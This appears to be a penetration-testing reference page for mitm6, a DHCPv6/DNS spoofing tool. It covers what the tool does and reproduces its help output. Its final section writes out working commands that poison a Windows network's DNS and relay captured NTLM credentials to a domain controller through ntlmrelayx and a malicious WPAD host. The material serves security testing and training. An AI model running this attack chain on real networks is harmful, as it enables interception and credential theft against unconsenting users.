Overview
MITM6 is a pentesting tool that exploits the default configuration of Windows to take over the default DNS server. It does this by replying to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attackers host as default DNS server. As DNS server, MITM6 will selectively reply to DNS queries of the attackers choosing and redirect the victims traffic to the attacker machine instead of the legitimate server. 1
MITM6 is also able to conduct credential relay attacks using the IMPacket NTLMrelayx tool to relay NTLM credentials for authentication and the krbrelayx tool that allows Kerberos authenitcation relays.
MITM6 comes packaged with Kali Linux by default.
| Tool Name | Version | MITRE ATT&CK Tactic | MITRE ATT&CK Technique |
|---|---|---|---|
| mitm6 | v0.3.0 | Credential Access | Adversary-in-the-Middle |
MITM6 Help Page
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
usage: mitm6 [-h] [-i INTERFACE] [-l LOCALDOMAIN] [-4 ADDRESS] [-6 ADDRESS]
[-m ADDRESS] [-a] [-r TARGET] [-v] [--debug] [-d DOMAIN]
[-b DOMAIN] [-hw DOMAIN] [-hb DOMAIN] [--ignore-nofqdn]
mitm6 - pwning IPv4 via IPv6
For help or reporting issues, visit https://github.com/dirkjanm/mitm6
optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Interface to use (default: autodetect)
-l LOCALDOMAIN, --localdomain LOCALDOMAIN
Domain name to use as DNS search domain (default: use
first DNS domain)
-4 ADDRESS, --ipv4 ADDRESS
IPv4 address to send packets from (default:
autodetect)
-6 ADDRESS, --ipv6 ADDRESS
IPv6 link-local address to send packets from (default:
autodetect)
-m ADDRESS, --mac ADDRESS
Custom mac address - probably breaks stuff (default:
mac of selected interface)
-a, --no-ra Do not advertise ourselves (useful for networks which
detect rogue Router Advertisements)
-r TARGET, --relay TARGET
Authentication relay target, will be used as fake DNS
server hostname to trigger Kerberos auth
-v, --verbose Show verbose information
--debug Show debug information
Filtering options:
-d DOMAIN, --domain DOMAIN
Domain name to filter DNS queries on (Allowlist
principle, multiple can be specified.)
-b DOMAIN, --blocklist DOMAIN, --blacklist DOMAIN
Domain name to filter DNS queries on (Blocklist
principle, multiple can be specified.)
-hw DOMAIN, -ha DOMAIN, --host-allowlist DOMAIN, --host-whitelist DOMAIN
Hostname (FQDN) to filter DHCPv6 queries on (Allowlist
principle, multiple can be specified.)
-hb DOMAIN, --host-blocklist DOMAIN, --host-blacklist DOMAIN
Hostname (FQDN) to filter DHCPv6 queries on (Blocklist
principle, multiple can be specified.)
--ignore-nofqdn Ignore DHCPv6 queries that do not contain the Fully
Qualified Domain Name (FQDN) option.
Instructions
Using MITM6 to Perform a NTLM Relay Attack
Execute the below command on the attacker machine. Ensure that the
-iswitch is set to interface that is on the same network as the target and that-dis set to the local domain being targeted.1
sudo mitm6 -i eth0 -d darkcybe.malnet
Using the IMPacket
ntlmrelayx.pyscript, set the target using the-tswitch which in this example is set to the Domain Controller running LDAPS.-whis set to name the malicious WPAD instance and-lto create a local file on the attacker machine in which the discovered loot will be dropped. 21
ntlmrelayx.py -6 -t ldaps://10.10.10.10 -wh malwpad.darkcybe.malnet -l lootcrate